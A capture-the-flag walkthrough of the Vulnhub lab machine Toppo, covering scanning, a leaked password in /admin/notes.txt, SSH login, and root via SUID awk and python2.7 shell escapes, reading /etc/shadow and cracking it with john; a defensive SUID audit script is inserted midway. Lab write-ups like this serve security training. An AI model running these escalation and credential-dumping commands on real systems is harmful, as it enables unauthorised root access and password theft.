Vulnhub Write-up — Toppo

Yash Anand
Published in InfoSec Write-ups
Apr 7, 2019

This is the write-up of the Machine Toppo from Vulnhub.

DIGEST

Toppo is a beginner-friendly machine based on a Linux platform. A notes.txt file left by the admin gives us the user, and exploiting SUID executables gives us root.

Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner

The IP address is given, so there is no need for netdiscover.

Scanning The Network

nmap -sC -sV 192.168.0.103
nmap on Toppo

Dirbuster on port 80

Dirbuster Result

Found notes.txt under the admin directory.

/admin/notes.txt

The note above gives us the password: 12345ted123

So let's guess the username ted and try to log in over SSH.

Own User

Log in over SSH
$ whoami; id
Own User

Privilege Escalation

I am using this script to find out the privilege escalation methods.

$ python -m SimpleHTTPServer

Starting a web server locally to transfer the privchecker script to the Toppo machine.

starting python server

Finding the Host machine IP address.

host machine IP

Downloading the script on the machine (Toppo)

$ wget http://192.168.0.105:8000/linuxprivchecker.py
Downloading the privchecker in toppo
$ chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py

Running the script on toppo.

Running privchecker

It lists some shell escape sequences. I am trying awk; you can try any of them.

Output

Root using awk

$ awk 'BEGIN{system("/bin/sh")}'
Own user using awk

/bin/bash did not give us root because bash has privilege escalation protection, but there is no such protection in /bin/sh.

Let's try a different method for privilege escalation. While searching on the internet I found this article.

Root using python

$ find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
snap from the above URL
Finding the perm

python2.7 is exploitable. See the SUID bit.

$ python2.7 -c "import pty; pty.spawn('/bin/sh');"
Own user using python
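Seen from the defender's side, the same finding (a set-id bit on python2.7 and awk) can be caught by an audit. The script below is an added example, not part of the original write-up or of linuxprivchecker; the interpreter name list, the function names and the depth limit of 3 (taken from the find command above) are assumptions of this example.

```python
import os
import re
import stat

# Tools that run caller-supplied commands: the two found on this box
# (python2.7, awk) plus a short, non-exhaustive list assumed for this example.
SHELL_CAPABLE = re.compile(r"^(python|awk|mawk|gawk|perl|ruby|vim|find)[\d.]*$")


def classify(path, mode):
    """Return a finding for a setuid/setgid regular file, else None."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    bits = [label for flag, label in ((stat.S_ISUID, "suid"), (stat.S_ISGID, "sgid"))
            if mode & flag]
    # A set-id interpreter lends its owner's privileges to whatever command the
    # caller passes in, so it is ranked above ordinary set-id binaries.
    high = bool(SHELL_CAPABLE.match(os.path.basename(path).lower()))
    return {"path": path, "bits": "+".join(bits), "high_risk": high}


def audit(root="/", max_depth=3):
    """Walk root down to max_depth levels and return findings, high risk first."""
    findings = []
    base = root.rstrip(os.sep).count(os.sep)
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if dirpath.rstrip(os.sep).count(os.sep) - base >= max_depth - 1:
            dirnames[:] = []                    # stop descending at max_depth
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            try:
                mode = os.lstat(path).st_mode   # lstat: symlinks are not followed
            except OSError:
                continue                        # unreadable or vanished entry
            finding = classify(path, mode)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: (not f["high_risk"], f["path"]))


if __name__ == "__main__":
    for f in audit("/", 3):
        tag = "HIGH" if f["high_risk"] else "info"
        line = "[%s] %-9s %s" % (tag, f["bits"], f["path"])
        if f["high_risk"]:
            line += "   remediate: chmod u-s,g-s " + f["path"]
        print(line)
```

Entries marked info (passwd, su and similar) are normally expected to be set-id; entries marked HIGH are the ones to strip the bit from.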

Cracking the root password

$ awk 'BEGIN{system("cat /etc/shadow")}'
/etc/shadow file
$ awk 'BEGIN{system("cat /etc/passwd")}'
/etc/passwd file
$ unshadow passwd shadow > crack
unshadow passwd & shadow file
$ john --wordlist=/usr/share/john/password.lst crack
finding the hash type using john
$ john --wordlist=/usr/share/john/password.lst --format=sha512crypt crack
cracking the root password using john

Own Root

Own root using the password
Flag

0wnedlab{p4ssi0n_c0me_with_pract1ce}
